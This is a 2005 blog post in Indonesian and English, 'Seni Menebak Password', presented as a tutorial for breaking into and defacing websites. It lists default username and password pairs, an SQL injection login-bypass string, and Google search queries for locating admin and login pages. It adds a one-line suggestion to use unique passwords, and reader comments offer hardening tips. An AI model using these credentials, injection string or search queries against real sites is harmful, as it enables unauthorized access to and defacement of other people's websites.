tety

Seni Menebak Password

[Prolog]
i wrote this article just for ‘hesti’

[describe]
Terkadang tidak memerlukan tools apa2 untuk mendeface sebuah web.Cukup dengan sedikit trial en error.Duarrr!!! …you enter to the admin folder

[proof of concept]
ada beberapa webmaster yang menggunakan kombinasi password yg sederhana untuk memudahkan update situs mereka.kombinasi default yang biasa mereka pakai adalah sebagai berikut:
-username:root password:root
-username:admin password:admin
-username:admin password:password
-username:admin password:[nama domain/subdomain]
-username:[nama domain/subdomain] password:admin
-username:[nama domain/subdomain] password:[nama domain/subdomain]
-username:’or”=’ password:’or”=’ [i.e. some sql injection]

[exploit]
go to google type a keyword:
“allinurl:admin”
“allinurl:admin.php”
“allinurl:Admin”
“allinurl:webmin”
“allinurl:admin.asp”
“allinurl:login.asp”

[solutions]
change the password to be a uniq password that anyone can not imagin it

[greetz]
thx to ‘hesty’ the one who push me to write this

This entry was posted on Monday, October 17th, 2005 at 1:47 pm and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

3 Responses to “Seni Menebak Password”

Administrator Says:
October 17th, 2005 at 4:14 pm
thanks bro. you are the best for me.
lirva32 Says:
November 10th, 2005 at 11:20 am
uupppsss… password user name + pass sebaiknya tidak terlalu simple + tidak terlalu panjang + kombinasi dengan angka… tapi juga perlu diperhatikan proses pembuatan folder… jgn mempergunakan nama2 folder yang mudah ditebak… utk folder2 bebas arahkan secara langsung ke index.html… jadi menghindari path disclosure… juga perhatikan apache settingangannya…

.thx
lirva32
hafidz Says:
November 11th, 2005 at 5:30 pm
upsss….

Seni Menebak Password

3 Responses to “Seni Menebak Password”

Leave a Reply